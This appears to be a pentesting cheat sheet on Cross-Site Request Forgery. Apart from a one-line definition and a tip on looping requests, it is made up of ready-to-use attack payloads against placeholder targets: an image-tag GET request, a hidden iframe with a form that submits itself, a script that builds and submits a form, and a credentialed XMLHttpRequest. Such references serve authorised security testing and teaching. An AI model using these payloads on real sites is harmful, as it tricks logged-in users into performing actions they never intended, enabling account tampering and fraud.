CSRF

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated.

GET

image
<img src="https://target.site/path?query" />

POST: application/x-www-form-urlencoded

iframe
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://vulnerablesite.com/form.php' target="csrf-frame" id="csrf-form">
  <input type='hidden' name='criticaltoggle' value='true'>
  <input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
JavaScript Form
<script>
method = "post|get"
path = "http://target.site/path?query"

params = {criticaltoggle: "true", randomparam: "randomvalue"}

var form = document.createElement("form");
form.setAttribute("method", method);
form.setAttribute("action", path);

for(var key in params) {
    if(params.hasOwnProperty(key)) {
        var hiddenField = document.createElement("input");
        hiddenField.setAttribute("type", "hidden");
        hiddenField.setAttribute("name", key);
        hiddenField.setAttribute("value", params[key]);

        form.appendChild(hiddenField);
    }
}

document.body.appendChild(form);
form.submit();
</script>

JavaScript AJAX

Depending on the Cross-Origin Resource Sharing (CORS) configuration, you might trigger a function vulnerable to a CSRF using AJAX.

<script>
var xh = new XMLHttpRequest();

xh.open("[METHOD]", "https://target.site/path?query", true);
xh.withCredentials = true;

xh.onreadystatechange = function(){
    switch(this.readyState) {
        case this.OPENED:
            console.log("[*] CSRF request sent");
            break;

        case this.HEADERS_RECEIVED:
            console.log("[*] CSRF response status: " + this.status);
            break;

        case this.DONE:
            console.log("[*] CSRF response received");
            break;
    }
}

xh.send();
</script>

Tip

If you need to perform multiple requests in a loop, you must include all the above line within the loop in order to prevent async issues.

References: